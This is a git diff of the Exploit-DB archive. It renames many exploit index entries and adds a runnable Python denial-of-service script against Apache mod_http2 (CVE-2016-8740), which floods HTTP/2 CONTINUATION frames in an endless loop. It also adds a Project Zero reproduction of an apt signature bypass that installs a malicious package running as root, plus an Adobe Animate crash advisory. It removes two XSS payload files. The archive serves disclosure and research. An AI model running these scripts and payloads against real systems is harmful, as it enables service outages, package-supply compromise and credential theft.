@@ -26736,11 +26738,11 @@ id,file,description,date,author,platform,type,port 24083,platforms/php/webapps/24083.txt,"PHPX 3.x - Multiple Cross-Site Scripting Vulnerabilities",2004-05-05,JeiAr,php,webapps,0 24086,platforms/php/webapps/24086.txt,"phlyLabs phlyMail Lite 4.03.04 - (go Parameter) Open Redirect",2013-01-13,LiquidWorm,php,webapps,0 24087,platforms/php/webapps/24087.txt,"phlyLabs phlyMail Lite 4.03.04 - Full Path Disclosure / Persistent Cross-Site Scripting",2013-01-13,LiquidWorm,php,webapps,0 -24088,platforms/php/webapps/24088.txt,"PHPX 3.x - admin/page.php Cross-Site Request Forgery / Arbitrary Command Execution",2004-05-05,JeiAr,php,webapps,0 -24089,platforms/php/webapps/24089.txt,"PHPX 3.x - admin/news.php Cross-Site Request Forgery / Arbitrary Command Execution",2004-05-05,JeiAr,php,webapps,0 -24090,platforms/php/webapps/24090.txt,"PHPX 3.x - admin/user.php Cross-Site Request Forgery / Arbitrary Command Execution",2004-05-05,JeiAr,php,webapps,0 -24091,platforms/php/webapps/24091.txt,"PHPX 3.x - admin/images.php Cross-Site Request Forgery / Arbitrary Command Execution",2004-05-05,JeiAr,php,webapps,0 -24092,platforms/php/webapps/24092.txt,"PHPX 3.x - admin/forums.php Cross-Site Request Forgery / Arbitrary Command Execution",2004-05-05,JeiAr,php,webapps,0 +24088,platforms/php/webapps/24088.txt,"PHPX 3.x - 'page.php' Cross-Site Request Forgery / Arbitrary Command Execution",2004-05-05,JeiAr,php,webapps,0 +24089,platforms/php/webapps/24089.txt,"PHPX 3.x - 'news.php' Cross-Site Request Forgery / Arbitrary Command Execution",2004-05-05,JeiAr,php,webapps,0 +24090,platforms/php/webapps/24090.txt,"PHPX 3.x - 'user.php' Cross-Site Request Forgery / Arbitrary Command Execution",2004-05-05,JeiAr,php,webapps,0 +24091,platforms/php/webapps/24091.txt,"PHPX 3.x - 'images.php' Cross-Site Request Forgery / Arbitrary Command Execution",2004-05-05,JeiAr,php,webapps,0 +24092,platforms/php/webapps/24092.txt,"PHPX 3.x - 'forums.php' Cross-Site Request Forgery / Arbitrary Command Execution",2004-05-05,JeiAr,php,webapps,0 24094,platforms/cgi/webapps/24094.txt,"SurgeLDAP 1.0 - Web Administration Authentication Bypass",2004-05-05,"GSS IT",cgi,webapps,0 24099,platforms/php/webapps/24099.txt,"Adam Webb NukeJokes 1.7/2.0 Module - Multiple Parameter Cross-Site Scripting",2004-05-08,"Janek Vind",php,webapps,0 24100,platforms/php/webapps/24100.txt,"Adam Webb NukeJokes 1.7/2.0 Module - modules.php jokeid Parameter SQL Injection",2004-05-08,"Janek Vind",php,webapps,0 @@ -29672,7 +29674,7 @@ id,file,description,date,author,platform,type,port 28433,platforms/php/webapps/28433.txt,"BigACE 1.8.2 - 'upload_form.php' Remote File Inclusion",2006-08-26,Vampire,php,webapps,0 28434,platforms/php/webapps/28434.txt,"BigACE 1.8.2 - 'download.cmd.php' Remote File Inclusion",2006-08-26,Vampire,php,webapps,0 28435,platforms/php/webapps/28435.txt,"BigACE 1.8.2 - 'admin.cmd.php' Remote File Inclusion",2006-08-26,Vampire,php,webapps,0 -28436,platforms/php/webapps/28436.txt,"Alstrasoft Video Share Enterprise 4.x - MyajaxPHP.php Remote File Inclusion",2006-08-26,night_warrior771,php,webapps,0 +28436,platforms/php/webapps/28436.txt,"Alstrasoft Video Share Enterprise 4.x - 'MyajaxPHP.php' Remote File Inclusion",2006-08-26,night_warrior771,php,webapps,0 28437,platforms/php/webapps/28437.txt,"Joomla! / Mambo Component Comprofiler 1.0 - 'class.php' Remote File Inclusion",2006-08-26,Matdhule,php,webapps,0 28439,platforms/php/webapps/28439.txt,"HLstats 1.34 - hlstats.php Cross-Site Scripting",2006-08-29,kefka,php,webapps,0 28440,platforms/php/webapps/28440.txt,"ModuleBased CMS - Multiple Remote File Inclusion",2006-08-29,sCORPINo,php,webapps,0 @@ -30639,9 +30641,9 @@ id,file,description,date,author,platform,type,port 29705,platforms/php/webapps/29705.txt,"Tyger Bug Tracking System 1.1.3 - register.php PATH_INFO Parameter Cross-Site Scripting",2007-02-26,CorryL,php,webapps,0 29709,platforms/hardware/webapps/29709.txt,"Ruckus Wireless Zoneflex 2942 Wireless Access Point - Authentication Bypass",2013-11-19,myexploit,hardware,webapps,80 30368,platforms/php/webapps/30368.txt,"Alstrasoft Sms Text Messaging Enterprise 2.0 - admin/edituser.php userid Parameter Cross-Site Scripting",2007-07-23,Lostmon,php,webapps,0 -30369,platforms/php/webapps/30369.txt,"Alstrasoft Affiliate Network Pro 8.0 - merchants/index.php Multiple Parameter Cross-Site Scripting",2007-07-23,Lostmon,php,webapps,0 -30370,platforms/php/webapps/30370.txt,"Alstrasoft Affiliate Network Pro 8.0 - merchants/temp.php rowid Parameter Cross-Site Scripting",2007-07-23,Lostmon,php,webapps,0 -30371,platforms/php/webapps/30371.txt,"Alstrasoft Affiliate Network Pro 8.0 - merchants/index.php uploadProducts Action pgmid Parameter SQL Injection",2007-07-23,Lostmon,php,webapps,0 +30369,platforms/php/webapps/30369.txt,"Alstrasoft Affiliate Network Pro 8.0 - 'index.php' Cross-Site Scripting",2007-07-23,Lostmon,php,webapps,0 +30370,platforms/php/webapps/30370.txt,"Alstrasoft Affiliate Network Pro 8.0 - 'temp.php' Cross-Site Scripting",2007-07-23,Lostmon,php,webapps,0 +30371,platforms/php/webapps/30371.txt,"Alstrasoft Affiliate Network Pro 8.0 - 'pgmid' Parameter SQL Injection",2007-07-23,Lostmon,php,webapps,0 29715,platforms/php/webapps/29715.txt,"EPortfolio 1.0 - Client Side Input Validation",2007-03-05,"Stefan Friedli",php,webapps,0 29722,platforms/php/webapps/29722.txt,"JCCorp URLShrink Free 1.3.1 - CreateURL.php Remote File Inclusion",2007-03-09,"Hasadya Raed",php,webapps,0 29726,platforms/asp/webapps/29726.pl,"Duyuru Scripti - Goster.asp SQL Injection",2007-03-09,Cr@zy_King,asp,webapps,0 @@ -30662,11 +30664,11 @@ id,file,description,date,author,platform,type,port 29751,platforms/php/webapps/29751.php,"phpStats 0.1.9 - PHP-Stats-options.php Remote Code Execution",2007-03-17,rgod,php,webapps,0 29754,platforms/php/webapps/29754.html,"WordPress 2.x - PHP_Self Cross-Site Scripting",2007-03-19,"Alexander Concha",php,webapps,0 29755,platforms/php/webapps/29755.html,"Guesbara 1.2 - Administrator Password Change",2007-03-19,Kacper,php,webapps,0 -29756,platforms/php/webapps/29756.txt,"PHPX 3.5.15/3.5.16 - print.php news_id Parameter SQL Injection",2007-03-19,"laurent gaffie",php,webapps,0 -29757,platforms/php/webapps/29757.txt,"PHPX 3.5.15/3.5.16 - forums.php Multiple Parameter SQL Injection",2007-03-19,"laurent gaffie",php,webapps,0 -29758,platforms/php/webapps/29758.txt,"PHPX 3.5.15/3.5.16 - users.php user_id Parameter SQL Injection",2007-03-19,"laurent gaffie",php,webapps,0 -29759,platforms/php/webapps/29759.php,"PHPX 3.5.15/3.5.16 - news.php Multiple Parameter SQL Injection",2007-03-19,"laurent gaffie",php,webapps,0 -29760,platforms/php/webapps/29760.txt,"PHPX 3.5.15/3.5.16 - gallery.php Multiple Parameter SQL Injection",2007-03-19,"laurent gaffie",php,webapps,0 +29756,platforms/php/webapps/29756.txt,"PHPX 3.5.15/3.5.16 - 'print.php' SQL Injection",2007-03-19,"laurent gaffie",php,webapps,0 +29757,platforms/php/webapps/29757.txt,"PHPX 3.5.15/3.5.16 - 'forums.php' SQL Injection",2007-03-19,"laurent gaffie",php,webapps,0 +29758,platforms/php/webapps/29758.txt,"PHPX 3.5.15/3.5.16 - 'users.php' SQL Injection",2007-03-19,"laurent gaffie",php,webapps,0 +29759,platforms/php/webapps/29759.php,"PHPX 3.5.15/3.5.16 - 'news.php' SQL Injection",2007-03-19,"laurent gaffie",php,webapps,0 +29760,platforms/php/webapps/29760.txt,"PHPX 3.5.15/3.5.16 - 'gallery.php' SQL Injection",2007-03-19,"laurent gaffie",php,webapps,0 29761,platforms/cgi/webapps/29761.txt,"LedgerSMB1.0/1.1 / SQL-Ledger 2.6.x - Login Parameter Local File Inclusion / Authentication Bypass Vulnerabilities",2007-03-19,"Chris Travers",cgi,webapps,0 29762,platforms/php/webapps/29762.txt,"Web Wiz Forums 8.05 - String Filtering SQL Injection",2007-03-20,"Ivan Fratric",php,webapps,0 29763,platforms/php/webapps/29763.php,"W-Agora 4.2.1 - Multiple Arbitrary File Upload Vulnerabilities",2007-03-20,"laurent gaffie",php,webapps,0 @@ -32268,14 +32270,14 @@ id,file,description,date,author,platform,type,port 32317,platforms/php/webapps/32317.txt,"@Mail 5.42 and @Mail WebMail 5.0.5 - Multiple Cross-Site Scripting",2008-09-03,C1c4Tr1Z,php,webapps,0 32318,platforms/php/webapps/32318.txt,"XRms 1.99.2 - 'login.php' target Parameter Cross-Site Scripting",2008-09-04,"Fabian Fingerle",php,webapps,0 32319,platforms/php/webapps/32319.txt,"OpenSupports 2.x - Authentication Bypass / Cross-Site Request Forgery",2014-03-17,"TN CYB3R",php,webapps,0 -32320,platforms/php/webapps/32320.txt,"XRms 1.99.2 - activities/some.php title Parameter Cross-Site Scripting",2008-09-04,"Fabian Fingerle",php,webapps,0 -32321,platforms/php/webapps/32321.txt,"XRms 1.99.2 - companies/some.php company_name Parameter Cross-Site Scripting",2008-09-04,"Fabian Fingerle",php,webapps,0 -32322,platforms/php/webapps/32322.txt,"XRms 1.99.2 - contacts/some.php last_name Parameter Cross-Site Scripting",2008-09-04,"Fabian Fingerle",php,webapps,0 -32323,platforms/php/webapps/32323.txt,"XRms 1.99.2 - campaigns/some.php campaign_title Parameter Cross-Site Scripting",2008-09-04,"Fabian Fingerle",php,webapps,0 -32324,platforms/php/webapps/32324.txt,"XRms 1.99.2 - opportunities/some.php opportunity_title Parameter Cross-Site Scripting",2008-09-04,"Fabian Fingerle",php,webapps,0 -32325,platforms/php/webapps/32325.txt,"XRms 1.99.2 - cases/some.php case_title Parameter Cross-Site Scripting",2008-09-04,"Fabian Fingerle",php,webapps,0 -32326,platforms/php/webapps/32326.txt,"XRms 1.99.2 - files/some.php file_id Parameter Cross-Site Scripting",2008-09-04,"Fabian Fingerle",php,webapps,0 -32327,platforms/php/webapps/32327.txt,"XRms 1.99.2 - reports/custom/mileage.php starting Parameter Cross-Site Scripting",2008-09-04,"Fabian Fingerle",php,webapps,0 +32320,platforms/php/webapps/32320.txt,"XRms 1.99.2 - 'title' Parameter Cross-Site Scripting",2008-09-04,"Fabian Fingerle",php,webapps,0 +32321,platforms/php/webapps/32321.txt,"XRms 1.99.2 - 'company_name' Parameter Cross-Site Scripting",2008-09-04,"Fabian Fingerle",php,webapps,0 +32322,platforms/php/webapps/32322.txt,"XRms 1.99.2 - 'last_name' Parameter Cross-Site Scripting",2008-09-04,"Fabian Fingerle",php,webapps,0 +32323,platforms/php/webapps/32323.txt,"XRms 1.99.2 - 'campaign_title' Parameter Cross-Site Scripting",2008-09-04,"Fabian Fingerle",php,webapps,0 +32324,platforms/php/webapps/32324.txt,"XRms 1.99.2 - 'opportunity_title' Parameter Cross-Site Scripting",2008-09-04,"Fabian Fingerle",php,webapps,0 +32325,platforms/php/webapps/32325.txt,"XRms 1.99.2 - 'case_title' Parameter Cross-Site Scripting",2008-09-04,"Fabian Fingerle",php,webapps,0 +32326,platforms/php/webapps/32326.txt,"XRms 1.99.2 - 'file_id' Parameter Cross-Site Scripting",2008-09-04,"Fabian Fingerle",php,webapps,0 +32327,platforms/php/webapps/32327.txt,"XRms 1.99.2 - 'starting' Parameter Cross-Site Scripting",2008-09-04,"Fabian Fingerle",php,webapps,0 32330,platforms/php/webapps/32330.txt,"OpenSupports 2.0 - Blind SQL Injection",2014-03-17,indoushka,php,webapps,0 32331,platforms/php/webapps/32331.txt,"Joomla! Component AJAX Shoutbox 1.6 - SQL Injection",2014-03-17,"Ibrahim Raafat",php,webapps,0 32334,platforms/php/webapps/32334.txt,"CeleronDude Uploader 6.1 - 'account.php' Cross-Site Scripting",2008-09-03,Xc0re,php,webapps,0 @@ -33310,7 +33312,6 @@ id,file,description,date,author,platform,type,port 34265,platforms/php/webapps/34265.txt,"Exponent CMS 0.97 - 'Slideshow.js.php' Cross-Site Scripting",2010-07-07,"Andrei Rimsa Alvares",php,webapps,0 34266,platforms/php/webapps/34266.txt,"RunCMS 2.1 - 'check.php' Cross-Site Scripting",2010-07-07,"Andrei Rimsa Alvares",php,webapps,0 34268,platforms/php/webapps/34268.txt,"Worxware DCP-Portal 7.0 - Multiple Cross-Site Scripting Vulnerabilities",2010-07-07,"Andrei Rimsa Alvares",php,webapps,0 -34269,platforms/php/webapps/34269.txt,"Pligg 1.0.4 - 'install1.php' Cross-Site Scripting",2010-07-07,"Andrei Rimsa Alvares",php,webapps,0 34273,platforms/php/webapps/34273.txt,"HybridAuth 2.2.2 - Remote Code Execution",2014-08-06,@u0x,php,webapps,80 34275,platforms/php/webapps/34275.txt,"Pro Chat Rooms 8.2.0 - Multiple Vulnerabilities",2014-08-06,"Mike Manzotti",php,webapps,80 34277,platforms/php/webapps/34277.txt,"Feng Office - Persistent Cross-Site Scripting",2014-08-06,"Juan Sacco",php,webapps,0 @@ -36873,4 +36874,4 @@ id,file,description,date,author,platform,type,port 40901,platforms/hardware/webapps/40901.txt,"ARG-W4 ADSL Router - Multiple Vulnerabilities",2016-12-11,"Persian Hack Team",hardware,webapps,0 40904,platforms/php/webapps/40904.txt,"Smart Guard Network Manager 6.3.2 - SQL Injection",2016-12-03,"Rahul Raz",php,webapps,0 40908,platforms/php/webapps/40908.html,"WordPress Plugin Multisite Post Duplicator 0.9.5.1 - Cross-Site Request Forgery",2016-12-12,dxw,php,webapps,80 -40912,platforms/php/webapps/40912.txt,"Joomla! Component DT Register - 'cat' SQL Injection",2016-12-13,"Elar Lang",php,webapps,80 +40912,platforms/php/webapps/40912.txt,"Joomla! Component DT Register - 'cat' Parameter SQL Injection",2016-12-13,"Elar Lang",php,webapps,80 diff --git a/platforms/linux/dos/40909.py b/platforms/linux/dos/40909.py new file mode 100755 index 000000000..c5c2498a7 --- /dev/null +++ b/platforms/linux/dos/40909.py @@ -0,0 +1,45 @@ +#!/usr/bin/python + +""" source : http://seclists.org/bugtraq/2016/Dec/3 +The mod_http2 module in the Apache HTTP Server 2.4.17 through 2.4.23, when the Protocols configuration includes h2 or h2c, does not restrict request-header length, which allows remote attackers to cause a denial of service (memory consumption) via crafted CONTINUATION frames in an HTTP/2 request.(https://access.redhat.com/security/cve/cve-2016-8740) + +Usage : cve-2016-8740.py [HOST] [PORT] +""" + +import sys +import struct +import socket + +HOST = sys.argv[1] +PORT = int(sys.argv[2]) + +s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +s.connect((HOST, PORT)) + +# https://http2.github.io/http2-spec/#ConnectionHeader +s.sendall('PRI * HTTP/2.0\r\n\r\nSM\r\n\r\n') + +# https://http2.github.io/http2-spec/#SETTINGS +SETTINGS = struct.pack('3B', 0x00, 0x00, 0x00) # Length +SETTINGS += struct.pack('B', 0x04) # Type +SETTINGS += struct.pack('B', 0x00) +SETTINGS += struct.pack('>I', 0x00000000) +s.sendall(SETTINGS) + +# https://http2.github.io/http2-spec/#HEADERS +HEADER_BLOCK_FRAME = '\x82\x84\x86\x41\x86\xa0\xe4\x1d\x13\x9d\x09\x7a\x88\x25\xb6\x50\xc3\xab\xb6\x15\xc1\x53\x03\x2a\x2f\x2a\x40\x83\x18\xc6\x3f\x04\x76\x76\x76\x76' +HEADERS = struct.pack('>I', len(HEADER_BLOCK_FRAME))[1:] # Length +HEADERS += struct.pack('B', 0x01) # Type +HEADERS += struct.pack('B', 0x00) # Flags +HEADERS += struct.pack('>I', 0x00000001) # Stream ID +s.sendall(HEADERS + HEADER_BLOCK_FRAME) + +# Sending CONTINUATION frames for leaking memory +# https://http2.github.io/http2-spec/#CONTINUATION +while True: + HEADER_BLOCK_FRAME = '\x40\x83\x18\xc6\x3f\x04\x76\x76\x76\x76' + HEADERS = struct.pack('>I', len(HEADER_BLOCK_FRAME))[1:] # Length + HEADERS += struct.pack('B', 0x09) # Type + HEADERS += struct.pack('B', 0x01) # Flags + HEADERS += struct.pack('>I', 0x00000001) # Stream ID + s.sendall(HEADERS + HEADER_BLOCK_FRAME) diff --git a/platforms/linux/remote/40916.txt b/platforms/linux/remote/40916.txt new file mode 100755 index 000000000..c212ab09c --- /dev/null +++ b/platforms/linux/remote/40916.txt @@ -0,0 +1,184 @@ +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1020 + +== Vulnerability == +When apt-get updates a repository that uses an InRelease file (clearsigned +Release files), this file is processed as follows: +First, the InRelease file is downloaded to disk. +In a subprocess running the gpgv helper, "apt-key verify" (with some more +arguments) is executed through the following callchain: + +gpgv.cc:main -> pkgAcqMethod::Run -> GPGVMethod::URIAcquire + -> GPGVMethod::VerifyGetSigners -> ExecGPGV + +ExecGPGV() splits the clearsigned file into payload and signature using +SplitClearSignedFile(), calls apt-key on these two files to perform the +cryptographic signature verification, then discards the split files and only +retains the clearsigned original. SplitClearSignedFile() ignores leading and +trailing garbage. + +Afterwards, in the parent process, the InRelease file has to be loaded again +so that its payload can be processed. At this point, the code +isn't aware anymore whether the Release file was clearsigned or +split-signed, so the file is opened using OpenMaybeClearSignedFile(), which +first attempts to parse the file as a clearsigned (InRelease) file and extract +the payload, then falls back to treating the file as the file as a split-signed +(Release) file if the file format couldn't be recognized. + +The weakness here is: If an attacker can create an InRelease file that +is parsed as a proper split-signed file during signature validation, but then +isn't recognized by OpenMaybeClearSignedFile(), the "leading garbage" that was +ignored by the signature validation is interpreted as repository metadata, +bypassing the signing scheme. + +It first looks as if it would be impossible to create a file that is recognized +as split-signed by ExecGPGV(), but isn't recognized by +OpenMaybeClearSignedFile(), because both use the same function, +SplitClearSignedFile(), for parsing the file. However, multiple executions of +SplitClearSignedFile() on the same data can actually have different non-error +results because of a bug. +SplitClearSignedFile() uses getline() to parse the input file. A return code +of -1, which signals that either EOF or an error occured, is always treated +as EOF. The Linux manpage only lists EINVAL (caused by bad arguments) as +possible error code, but because the function allocates (nearly) unbounded +amounts of memory, it can actually also fail with ENOMEM if it runs out of +memory. +Therefore, if an attacker can cause the address space in the main apt-get +process to be sufficiently constrained to prevent allocation of a large line +buffer while the address space of the gpgv helper process is less constrained +and permits the allocation of a buffer with the same size, the attacker can use +this to fake an end-of-file condition in SplitClearSignedFile() that causes the +file to be parsed as a normal Release file. + +A very crude way to cause such a constraint on a 32-bit machine is based on +abusing ASLR. Because ASLR randomizes the address space after each execve(), +thereby altering how much contiguous virtual memory is available, an allocation +that attempts to use the average available virtual memory should ideally succeed +50% of the time, resulting in an upper limit of 25% for the success rate of the +whole attack. (That's not very effective, and a real attacker would likely want +a much higher success rate, but it works for a proof of concept.) +This is not necessarily a limitation of the vulnerability, just a limitation +of the way the exploit is designed. + +I think that it would make sense to fix this as follows: + - Set errno to 0 before calling getline(), verify that it's still 0 after + returning -1, treat it as an error if errno isn't 0 anymore. + - Consider splitting the InRelease file only once, before signature validation, + and then deleting the original clearsigned file instead of the payload file. + This would get rid of the weakness that the file is parsed twice and parsing + differences can have security consequences, which is a pretty brittle design. + - I'm not sure whether this bug would have been exploitable if the parser for + split files or the parser for Release files had been stricter. You might want + to consider whether you could harden this code that way. + + + +== Reproduction instructions == +These steps are probably more detailed than necessary. + +First, prepare a clean Debian VM for the victim: + + - download debian-8.6.0-i386-netinst.iso (it is important that this + is i386 and not amd64) + - install Virtualbox (I'm using version 4.6.36 from Ubuntu) + - create a new VM with the following properties: + - type "Linux", version "Debian (32-bit)" + - 8192 MB RAM (this probably doesn't matter much, especially + if you enable swap) + - create a new virtual harddrive, size 20GB (also doesn't matter much) + - launch the VM, insert the CD + - pick graphical install + - in the installer, use defaults everywhere, apart from enabling Xfce + in the software selection + +After installation has finished, log in, launch a terminal, +"sudo nano /etc/apt/sources.list", change the "deb" line for jessie-updates +so that it points to some unused port on the host machine instead of +the proper mirror +("deb http://192.168.0.2:1337/debian/ jessie-updates main" or so). +This simulates a MITM attack or compromised mirror. + +On the host (as the attacker): + + +$ tar xvf apt_sig_bypass.tar +apt_sig_bypass/ +apt_sig_bypass/debian/ +apt_sig_bypass/debian/netcat-evil.deb +apt_sig_bypass/debian/dists/ +apt_sig_bypass/debian/dists/jessie-updates/ +apt_sig_bypass/debian/dists/jessie-updates/InRelease.part1 +apt_sig_bypass/debian/dists/jessie-updates/main/ +apt_sig_bypass/debian/dists/jessie-updates/main/binary-i386/ +apt_sig_bypass/debian/dists/jessie-updates/main/binary-i386/Packages +apt_sig_bypass/make_inrelease.py +$ cd apt_sig_bypass/ +$ curl --output debian/dists/jessie-updates/InRelease.part2 http://ftp.us.debian.org/debian/dists/jessie-updates/InRelease + % Total % Received % Xferd Average Speed Time Time Time Current + Dload Upload Total Spent Left Speed +100 141k 100 141k 0 0 243k 0 --:--:-- --:--:-- --:--:-- 243k +$ ./make_inrelease.py +$ ls -lh debian/dists/jessie-updates/InRelease +-rw-r--r-- 1 user user 1.3G Dec 5 17:13 debian/dists/jessie-updates/InRelease +$ python -m SimpleHTTPServer 1337 . +Serving HTTP on 0.0.0.0 port 1337 ... + + +Now, in the VM, as root, run "apt-get update". +It will probably fail - run it again until it doesn't fail anymore. +The errors that can occur are "Clearsigned file isn't valid" (when the +allocation during gpg verification fails) and some message about +a hash mismatch (when both allocations succeed). After "apt-get update" +has succeeded, run "apt-get upgrade" and confirm the upgrade. The result should +look like this (server IP censored, irrelevant output removed and marked with +"[...]"): + +root@debian:/home/user# apt-get update +Get:1 http://{{{SERVERIP}}}:1337 jessie-updates InRelease [1,342 MB] +[...] +Hit http://ftp.us.debian.org jessie-updates InRelease +[...] +100% [1 InRelease gpgv 1,342 MB] 28.6 MB/s 0sSplitting up /var/lib/apt/lists/partial/{{{SERVERIP}}}:1337_debian_dists_jessie-updates_InRelease intIgn http://{{{SERVERIP}}}:1337 jessie-updates InRelease +E: GPG error: http://{{{SERVERIP}}}:1337 jessie-updates InRelease: Clearsigned file isn't valid, got 'NODATA' (does the network require authentication?) + +root@debian:/home/user# apt-get update +[...] +Get:1 http://{{{SERVERIP}}}:1337 jessie-updates InRelease [1,342 MB] +[...] +Hit http://ftp.us.debian.org jessie-updates InRelease +Get:4 http://{{{SERVERIP}}}:1337 jessie-updates/main i386 Packages [170 B] +[...] +Fetched 1,349 MB in 55s (24.4 MB/s) +Reading package lists... Done + +root@debian:/home/user# apt-get upgrade +Reading package lists... Done +Building dependency tree +Reading state information... Done +Calculating upgrade... Done +The following packages will be upgraded: + netcat-traditional +1 upgraded, 0 newly installed, 0 to remove and 0 not upgraded. +Need to get 666 B of archives. +After this operation, 109 kB disk space will be freed. +Do you want to continue? [Y/n] +Get:1 http://{{{SERVERIP}}}:1337/debian/ jessie-updates/main netcat-traditional i386 9000 [666 B] +Fetched 666 B in 0s (0 B/s) +Reading changelogs... Done +dpkg: warning: parsing file '/var/lib/dpkg/tmp.ci/control' near line 5 package 'netcat-traditional': + missing description +dpkg: warning: parsing file '/var/lib/dpkg/tmp.ci/control' near line 5 package 'netcat-traditional': + missing maintainer +(Reading database ... 86469 files and directories currently installed.) +Preparing to unpack .../netcat-traditional_9000_i386.deb ... +arbitrary code execution reached +uid=0(root) gid=0(root) groups=0(root) +[...] + +As you can see, if the attacker gets lucky with the ASLR randomization, there +are no security warnings and "apt-get upgrade" simply installs the malicious +version of the package. (The dpkg warnings are just because I created a minimal +package file, without some of the usual information.) + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40916.zip diff --git a/platforms/php/webapps/22384.txt b/platforms/php/webapps/22384.txt deleted file mode 100755 index 68ac9cfab..000000000 --- a/platforms/php/webapps/22384.txt +++ /dev/null @@ -1,11 +0,0 @@ -source: http://www.securityfocus.com/bid/7140/info - -It has been reported that Siteframe does not sufficiently filter user supplied URI parameters on Siteframe pages. - -As a result of this deficiency, it is possible for a remote attacker to create a malicious link containing script code that will be executed in the browser of a legitimate user. All code will be executed within the context of the website running Siteframe. - -This may allow for theft of cookie-based authentication credentials and other attacks. - -This vulnerability was reported to affect Siteframe version 2.2.4, it is not currently known if other versions are affected. - -http://www.example.com/search.php?searchfor="> \ No newline at end of file diff --git a/platforms/php/webapps/34269.txt b/platforms/php/webapps/34269.txt deleted file mode 100755 index 97be1d203..000000000 --- a/platforms/php/webapps/34269.txt +++ /dev/null @@ -1,11 +0,0 @@ -source: http://www.securityfocus.com/bid/41456/info - -Pligg is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. - -An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. - -Pligg 1.0.4 is vulnerable; other versions may also be affected. - -http://www.example.com/install/install1.php?language=%22%20onmouseover=alert()%3E -http://www.example.com/install/install1.php?language=%22%20style=a:b;margin-top:-1000px;margin-left:-100px;width:4000px;height:4000px;display:block;%20onmouseover=alert%28String.fromCharCode%2888,83,83%29%29;%3E - diff --git a/platforms/php/webapps/5975.txt b/platforms/php/webapps/5975.txt index afff37e68..78a9e4dfa 100755 --- a/platforms/php/webapps/5975.txt +++ b/platforms/php/webapps/5975.txt @@ -86,12 +86,12 @@ REPLY: Category : +href="?mode=viewcat&cat_id=1"> [SQL INJECTION RESULT - ADMIN NAME] -> [SQL INJECTION RESULT - ADMIN PASSWORD] Posted By : 1 | -Comments[1] | +Comments[1] | SQL Injection Vulnerability 2: @@ -105,7 +105,7 @@ http://somedomain.com/file.html: http://[TARGET]/[MYBLOGGIE-DIRECTORY]/admin.php?mode=edit" method="POST"> diff --git a/platforms/windows/dos/40915.txt b/platforms/windows/dos/40915.txt new file mode 100755 index 000000000..f74da88c0 --- /dev/null +++ b/platforms/windows/dos/40915.txt @@ -0,0 +1,133 @@ +[+] Credits: John Page aka hyp3rlinx + +[+] Website: hyp3rlinx.altervista.org + +[+] Source: http://hyp3rlinx.altervista.org/advisories/ADOBE-ANIMATE-MEMORY-CORRUPTION-VULNERABILITY.txt + +[+] ISR: ApparitionSec + + + +Vendor: +============= +www.adobe.com + + + +Product(s): +============================= +Adobe Animate +15.2.1.95 and earlier versions + +Adobe Animate (formerly Adobe Flash Professional, Macromedia Flash, and +FutureSplash Animator) is a multimedia authoring and computer +animation program developed by Adobe Systems. + + + +Platforms: +=================== +Windows / Macintosh + + + +Vulnerability Type: +======================================= +Critical Memory Corruption Vulnerability + + + +CVE Reference: +============== +CVE-2016-7866 +APSB16-38 + + + +Vulnerability Details: +===================== +Adobe Animate suffers from a Buffer Overflow when creating .FLA files with +ActionScript Classes that use overly long Class names. +This causes memory corruption leading to possible arbitrary code execution +upon opening a maliciously created .Fla Flash file. + + +Reproduction / POC: + + +1) Create FLA with overly long Class name in FLA Class publish properties +input field. +2) Save and close +3) Reopen FLA, click edit to open the .as script file +4) "ctrl + s" to save then boom.... access violation + + +Distributed: +Create new ".as" ActionScript 3 (AS3) file and give it very long class name +in input field then hit "Ctrl+s" to save.. +you will crash IDE, next way described is ONE way how attackers can +distribute malicious .FLA + +Abusing JSFL, The Flash JavaScript application programming interface +(JavaScript API or JSAPI). + +1) Create following .JSFL file + +fl.getDocumentDOM().save(); +fl.getDocumentDOM().testMovie(); + +2) Create a MovieClip stored in FLA library with a very long class name +that extends MovieClip and export + it for ActionScript etc... + + +3) Drag the MovieClip to the stage + + +4) Bundle FLA/JSFL file, make avail for download as example on how to use +JSFL to call save() / publish() functions. + + +User opens .FLA, runs harmless looking JSFL code then BOOM! + + + +Reference: +https://helpx.adobe.com/security/products/animate/apsb16-38.html + + + + +Disclosure Timeline: +===================================== +Vendor Notification: May 28, 2016 +December 13, 2016 : Public Disclosure + + + + +Exploitation Technique: +======================= +Local + + + + +Severity Level: +================ +High + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no +warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, +provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in +vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the +information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author +prohibits any malicious use of security related information +or exploits by the author or elsewhere.